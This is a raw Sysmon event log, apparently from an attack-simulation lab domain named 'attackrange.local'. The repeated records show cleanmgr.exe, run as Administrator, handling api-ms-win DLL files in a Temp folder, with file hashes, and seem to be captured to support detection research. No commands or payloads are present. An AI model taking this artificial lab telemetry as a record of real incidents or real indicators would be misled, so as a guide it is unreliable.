07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-1.dllMD5=5A03B636125C21AB918D2CB04843DBA8,SHA256=C914CD6FE6C7B16533763BC789EDAF67D7A19C26514C927572051C4379C79FC0,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-0.dllMD5=0C61A8D9CF9BBF6D771BEF0FF4A43E23,SHA256=66807B95E13944D52E9A7AA1F1A41E632FAA46F6B48F98451618DB3845622577,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-xstate-l2-1-0.dllMD5=56A386E38B637FCD96CED04CEFBCF8DE,SHA256=A5BE1E3C71A3A5C8EEF4BFAD9D0BADC97BA47B2B9911CED4BD1B8F65BB8DCB77,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-xstate-l1-1-0.dllMD5=6A982D13DDB295E59F90FF23EDD2E60F,SHA256=3617DBCADFE370463B4DBB91C1C6222923F16EC362DE29C2CA3AE4E72C9ABB64,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-wow64-l1-1-0.dllMD5=AE7573E1DC370B9A8FEBCC17A6C82FF8,SHA256=59A473D1AD7C181C89AF00B966CD107F1846CDC526009C4807A1EAE3DCB3731D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-version-l1-1-0.dllMD5=5CB34501C2D784D31281FD526B0BB963,SHA256=E45B73AF0C35F05B01CADF6BD4F67C1497586F4C4F9A16F0448BA751E16C4596,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-util-l1-1-0.dllMD5=212DA9E9AD6BB61A3554A4174BA558CF,SHA256=01291D3895EC5BB0E658F91FE1512AADCBB6D8F1154BC6023076554AFA05AC1D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-url-l1-1-0.dllMD5=198A08F8150D7575CC207CFFCF67D66C,SHA256=86F6DA0F1D075B7E1678DF71689948FEC334CFB10316FEB40E5107135548F9B4,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-timezone-l1-1-0.dllMD5=4D7C132D9742FFA44248B1BBF32020FB,SHA256=58A65C1938DCDF64D2930B037E9D133A5ACDF46365835782869D3216D3CF2CED,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-private-l1-1-0.dllMD5=A9BC53B62CD4B269B8385ADBE0AE808D,SHA256=A30003AB0C020E433CC5296E7E150BB11820395D439062FF7FD6D7F449C4C5B3,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-legacy-l1-1-0.dllMD5=CAC86F4298EB2D239410B3338780DC34,SHA256=1D99842180A612D63F1A8B137A9BF0375B7113AAB325916BA4781AB8A7B68E7D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-l1-2-0.dllMD5=D32DDF80AB3F1F96F431E5672DC1F387,SHA256=E2F0F0D46082ED40D042BCCD47F4E917707CF884672C5919116126914FAD4572,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-1.dllMD5=E83097DFE144367FA2231828F9FD89A6,SHA256=69FA978126192DBAB6AF11C9878D9C2BD1FD7E3FC899300244DFA4A1AC7ACA31,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-0.dllMD5=8D842EBFFA7803451A3AC7D6907A6AD9,SHA256=808C22A733B5F6A4E601605DCF4043C9952CEBE825FF2622097FC5B4FACF682A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-1-0.dllMD5=376E34D4A8F94C94FFF063810717612D,SHA256=5285A11016967E2017A8187882579CBD722371D0B7497B356149FC447160A521,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-2-0.dllMD5=E19F4FA6A6313F00ADE8AF26649A0BA1,SHA256=386F6CC0C3CE0C904A44A2FDDD11B2E5EA7782B08E69FD961DA5BE3C32BA5C26,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-1-0.dllMD5=95088E453B41A8B50E7340E6DE9CD09C,SHA256=E4938C16CA5FC7A8C9D87E4201FA2F28992026F5858F36A2A44EA22B5BD0889F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringloader-l1-1-1.dllMD5=FE1D00B19175DE6E9729F709C508DD6B,SHA256=D726F32AEB323F4DEA55D35441D1FF06BF3E212846A6B86D9ADC8F9DD1307B57,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringansi-l1-1-0.dllMD5=43F8D61E2EE0E253B973EFED0B3EBC8D,SHA256=1B9FA225A474D42FF8360141C8BC1EE1E7310958910931AC8E5A213E957700BD,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-obsolete-l1-1-0.dllMD5=92C0A4E592B5D773C562A36CBA4E6E47,SHA256=5191E82E921398310FE9FD333F5CA44E6233358499EDD5B33BF8E9F0C9D3B88E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-l2-1-0.dllMD5=3E1902AF98905F00E62B1EC827EB0FC2,SHA256=503443DBF6E6E481EA1C661109CE17B3D55C4FEA001D77F11CD032BDDF64FD29,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-string-l1-1-0.dllMD5=D30D4587D051D288D1023DB0D826295A,SHA256=DFE66C8C205C95274565BADB7B3C19043917F6CD07A8DE34CE241EFFF9EA6676,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shutdown-l1-1-0.dllMD5=1D8D1283F8279BDDACF8745AEDA3DB2A,SHA256=21BF3432160DD9851CAAC716DF3A41E39428A84BA9B9D3C63CDD300CB6928300,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-obsolete-l1-1-0.dllMD5=33BEFB60C3DC3E93FCE54A0515100181,SHA256=24B3FA4C5E8AB463BD2CFB704D7BFA7E8429726852EF582F94E44D7691BDD1FB,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-legacy-l1-1-0.dllMD5=699CDC66AA090D13EFF451F2006944CF,SHA256=6212B2B8CF5533F9DB6E366BBADED7A8D6EAD6667EA6A425B6987102669D8D96,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-rtlsupport-l1-1-0.dllMD5=F9672F68330CD16B0D1FA3A75B123AE8,SHA256=C5938839A3DFFBFBFEF432D0A95D0773375B4758FC160EDD04383A4B4273A18B,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l2-1-0.dllMD5=BBC015F33C0C3C2F9FC58C466BF8A30A,SHA256=1ED3511DC98353CA8E9B22A40C318BBD24484C25C171886B06B22AFD396ACFE8,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l1-1-0.dllMD5=D132FADCBF190A1C68070E6D488E67D7,SHA256=E6F51C07641EF931C4F97E5D966242BB96A156A603A7769BEAE0EA61E9E25486,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-realtime-l1-1-0.dllMD5=792C54B79CA333ABBB51BE66815A98CF,SHA256=1E3B3505560AB3E641C386473A83AA194D94CD5BC6CC4FA718D003D1FF899601,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-profile-l1-1-0.dllMD5=C4E53285E8C51DCBEFF5098215759D69,SHA256=320A6138FE915BE7E83F4CDC2024531948185C3BFC939CB367A53F1AA74BFB2C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processtopology-obsolete-l1-1-0.dllMD5=99E3ACC47F10000AE67A577F5893FD5A,SHA256=AD01524D3FDDC25C91292808E7B333B587C902E996E557885E79CC10F9A66214,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-2.dllMD5=DABFBC1EAB7AEE555F3BAEAF981EC7EB,SHA256=3070505B0B060D9EE9C2B699A518481A22DC15ECAF9603089FCF9EBC022179C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-1.dllMD5=8C5DF20B2E2DE6BA6717A597A951E4F7,SHA256=BE42C78E3F21CD6E74811F27E1B76C4FE8537FB149EF34EA455F22AAA29720ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-0.dllMD5=3D0CD1FE610E55E8C151162004A1429F,SHA256=D43535460D9CF2F2D348E9F2027DAF9FC0C0C906D5066E15F86332C839C94651,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-2-0.dllMD5=BB20192D0B22AD2EBBF4960B66D2E164,SHA256=23E758C4F7646AACC2DE8B8930BB272115F726F27E5437DF606E1C2328FA48F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-1-0.dllMD5=2CF62C9CF255C15AD1C8B1CCDD9453D6,SHA256=35CDE2048D4EC8D5D02B1CA57B81B8D5F579541EDBAF5DA4485A6323B8C3A805,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-1.dllMD5=FA8EFF9B35BE58F70CD0014DAF108819,SHA256=835F086B0884E8E1689D661657F258FA1E71439672E9F0CC0140D614DAB6FA6F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-0.dllMD5=C8490BC5ACB353CAF140CB12670883A2,SHA256=85F3FE5E802843596F466D479111658B08271E48CC1821EB17E6D299D523C95E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-namedpipe-l1-1-0.dllMD5=D8F1E545D80C2045881C7F0525558D80,SHA256=0D9C3D6A6DF364F812D370258C1B3D3F97584E9F7D36569D06746EBA1695D368,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-2.dllMD5=9F77AA276A31F36805DF003F9E66BD99,SHA256=26425008D97A2EA8B95AF52BFE47CF5DE1DE9BB3E25DF77123B85C895192D7D6,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-1.dllMD5=728A5655624D5B091E8E216BE90D9EF9,SHA256=A2B17F63065CC760FA9CF5D2950D0E13613997546C90CFA1C094CF32171D49ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-0.dllMD5=BA6B6729DC95AA60AF31A160E2CB4533,SHA256=AA433713D5D1DB4413E9F5D938C0C452BAE8EB1BF8CD011803464BBD893BBB08,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-localization-obsolete-l1-2-0.dllMD5=B5727AD79BEBAAB6E6AFA381A28A8E9C,SHA256=C0E101B6BCDDC28A9BA24C7796BBDAAEFC14459E402FD53053F3C23E0D84D040,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.711{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-1.dllMD5=FD9B6F1EA88B7167E6EC227A61B90888,SHA256=2FEF21096468EE5C6BFC88971AFDB4CC07F6C4669375561863B85023C15684AF,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.710{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-0.dllMD5=C8420A86D981BB6AA0D32001D234639E,SHA256=2E93EA8BB070C07C39B7F042B7D9843C4B74B3D4E69C8E33D89B0574B2D1D43D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.709{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-1.dllMD5=787DCDC02E39A27A63B857FF6E819593,SHA256=91A7DEC7B636C00032D122CA04D4B8653B13E1211C54A4184F3955D2398C2E2E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.708{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-0.dllMD5=AC90FCC4E819CD2EEED5D09A1FA42BAC,SHA256=2DA68FCBCE619BE5A90501F971467B7A894C6A705659346729E1E4E306EEB7D7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.707{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-1.dllMD5=E269D033D63A117DA8F3F855B90CCBFD,SHA256=41437C84BF757CC5758BF381600D0DECB00E8F8F56F11765203B7880AC4CDDD0,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-0.dllMD5=58B0B7C61F098BD1E73E9C156CB38C64,SHA256=C366B92E7048081C7B336CEAB970BAA20AFDAEE2456820AA38360D1429C27669,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-1.dllMD5=912D93DCBE67A1373D93BACD0174E3ED,SHA256=0B94CB7472E0777AEFC1B3208ADDE41B893B78B3223F515FB86348D3362624C3,IMPHASH=00000000000000000000000000000000truetrue 